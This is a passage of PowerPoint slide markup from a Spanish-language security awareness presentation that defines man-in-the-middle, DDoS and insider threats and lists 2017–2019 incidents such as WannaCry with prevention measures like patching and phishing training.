                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MiTM</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{000CF519-F57B-0B79-80D2-E075ACCD4C1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CFD47CEC-AD59-DB7B-B90A-69EFB7D9B713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548415" y="1431073"/>
            <a:ext cx="9737666" cy="923330"/>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Ataque informático donde el cibercriminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>intercepta la comunicación entre dos personas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>y por ende sus datos terminan siendo robados. Frecuentemente se da a través de redes wifi desprotegidas. </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Diagrama&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E05AAAD-4BA0-926B-5ABB-BD41F703EC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4112460" y="2497379"/>
            <a:ext cx="3967079" cy="3211479"/>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0F43CB00-ACCB-F9E3-501A-87E31039AE6D}"/>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632710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D3C0C-50C3-FB43-350B-AB452BFB2CB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2ED5634-89B5-D818-2908-887EE23BF075}"/>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7466049-9EBD-577B-E540-0E34BA0B20D6}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DF6E03A-360D-A7FB-A3C8-A117B1F4543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Rectángulo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31038BCB-92BF-85A3-6BBF-5A6443354736}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453820" y="1393235"/>
            <a:ext cx="9737666" cy="646331"/>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Esta amenaza busca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>colapsar un servidor o web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, al saturarlo de solicitudes falsas, impidiendo su operación y que así se hagan funciones habituales.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Imagen que contiene Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB37B0F-AFC7-9BBA-FD02-6D7504D4AEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3375548" y="2298478"/>
            <a:ext cx="5084415" cy="3471701"/>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5A12234A-C5D0-7096-00F3-6829B46D653A}"/>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4031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6DE25-EBBA-831F-185F-1919DE2A839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4365189-D747-0A20-61DA-103C4449443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3F6843C-E71E-1B74-4B6F-60F606BCC359}"/>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Amenaza interna</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3115AB90-CE97-CD16-1271-593D75F46A8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B0A23421-5D31-AB6C-92B0-434BE8A103CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428596" y="1380622"/>
            <a:ext cx="9737666" cy="1477328"/>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Proviene frecuentemente de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ex empleados o personal descontento que mantienen acceso a los sistemas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>de la organización y los usan para sustraer datos y hacer infección por malware, entre otros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Imagen que contiene persona, sostener, hombre, mujer&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79576F08-1D46-89B5-7933-4FDD3FE54BCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136045" y="2592704"/>
            <a:ext cx="4807329" cy="3202702"/>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32401882-1689-A2BD-CADB-DA530CC6871E}"/>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130371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EF62-1FCE-300E-67FC-EAC223FB25A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BE98342-897F-F9C8-7875-FA4811FF3284}"/>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1E4565F-01B4-4C9B-E8B9-A3452C13A5E2}"/>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Ataques cibernéticos y cómo se podrían haber prevenido</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{201875EC-9C5B-6D21-AC26-6D3A7B26AE6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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Google Shape;1651;p48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E29E393-C085-E934-8AE0-2EABC93D2344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="618008" y="1434164"/>
            <a:ext cx="9799845" cy="4574706"/>
            <a:chOff x="5793258" y="2247269"/>
            <a:chExt cx="1159465" cy="629450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Google Shape;1652;p48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DA4383-1ABA-95F2-FB24-AAFEA1AA66DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5793258" y="2247269"/>
              <a:ext cx="490565" cy="28621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1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Descripción</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>ataque </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>ransomware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>WannaCry </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>que cifró archivos y equipos y exigió rescate en Bitcoin.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRP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ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>actualización sistemas operativos e instalación de parches de seguridad.</a:t>
              </a:r>
              <a:endParaRPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Google Shape;1653;p48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{460ED8BA-B448-1FBC-AF62-AFD7EC4EC086}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6462121" y="2247305"/>
              <a:ext cx="490602" cy="286183"/>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400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Descripción</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>ataque de ransomware </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>que </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>afectó sus sistemas exigiendo rescate en Bitcoin.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRP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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>concienciación de los empleados sobre el phishing y la necesidad de mantener actualizado el software de seguridad.</a:t>
              </a:r>
              <a:endParaRPr sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;1654;p48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{569B62F4-B4F5-298D-9419-D06C3FBE4F3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6127671" y="2590536"/>
              <a:ext cx="490602" cy="286183"/>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r>
                <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Descripción</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="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ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>ataque de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>denegación de servicio distribuido </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>DDoS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>) que afectó su sitio web dejándolo inaccesible varias horas.</a:t>
              </a:r>
              <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRP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ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>implementación de sistemas de mitigación y planes de contingencia.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Flecha: a la derecha 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1299973E-5FAC-F752-8CC4-D4211C54893B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554720" y="3611895"/>
            <a:ext cx="10269348" cy="27952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10" name="Elipse 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7653BCC8-F91F-44C7-E6C3-660F83841F58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2422962" y="3546717"/>
            <a:ext cx="472817" cy="438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600">
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Elipse 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4297907-0BB6-0EEB-7EF5-49EF3E3AFCF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289271" y="3499482"/>
            <a:ext cx="472817" cy="438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13" name="Elipse 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE02F6BE-CC56-8370-EE93-6872AB34594B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8155746" y="3558898"/>
            <a:ext cx="472817" cy="438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14" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B76C03-E3B3-9F59-83FA-6F11C7102801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2361924" y="3637762"/>
            <a:ext cx="1646477" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CuadroTexto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3534FF85-A7B6-5D0B-699C-43F396AB0779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237569" y="3599882"/>
            <a:ext cx="1646477" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="CuadroTexto 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22AE14D8-69F6-8E51-FE5A-2014EBF48110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8102581" y="3626828"/>
            <a:ext cx="1646477" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2019</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Imagen 16" descr="Logotipo&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB327ED-9A3F-6D79-32A2-5A4713878622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
